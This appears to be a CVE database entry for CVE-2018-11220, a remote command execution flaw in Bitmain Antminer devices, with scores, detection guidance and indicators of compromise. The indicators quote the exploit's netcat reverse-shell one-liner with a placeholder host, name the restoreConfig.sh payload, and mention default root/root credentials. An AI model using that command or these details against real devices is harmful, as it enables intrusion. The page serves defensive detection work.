cbcvebase.
CVE-2018-11220
published 2018-05-31

CVE-2018-11220: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution via the system restore function.

PriorityP267high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
16.41%
96.6th percentile
Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution via the system restore function.

Detection & IOCsextracted from sources · hover to see the quote

filenamerestoreConfig.sh
filenameExploit.tar
commandrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f
path/tmp/f
  • Monitor HTTP multipart file upload requests to the system restore/upgrade endpoint containing a TAR archive with a file named 'restoreConfig.sh' — this is the malicious payload delivery mechanism for CVE-2018-11220.
  • Alert on the presence of a named pipe at /tmp/f combined with an outbound netcat (nc) connection, which is the reverse shell pattern used in the exploit payload.
  • Exploitation requires valid credentials; default credentials root/root on Bitmain Antminer devices should be treated as an active risk indicator — successful login followed by a restore/upgrade action is a high-fidelity attack sequence.
  • Inspect uploaded TAR archives to the Antminer administration portal for the presence of shell scripts, particularly 'restoreConfig.sh', which is executed during the system restore process.
  • ·Exploitation requires valid credentials to the Antminer administration portal, meaning the attacker must already have (or have guessed/brute-forced) login access before the RCE is reachable.
  • ·The vulnerability affects multiple Antminer device families (D3, L3+, S9, and potentially others), so detection and patching scope should not be limited to a single model.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.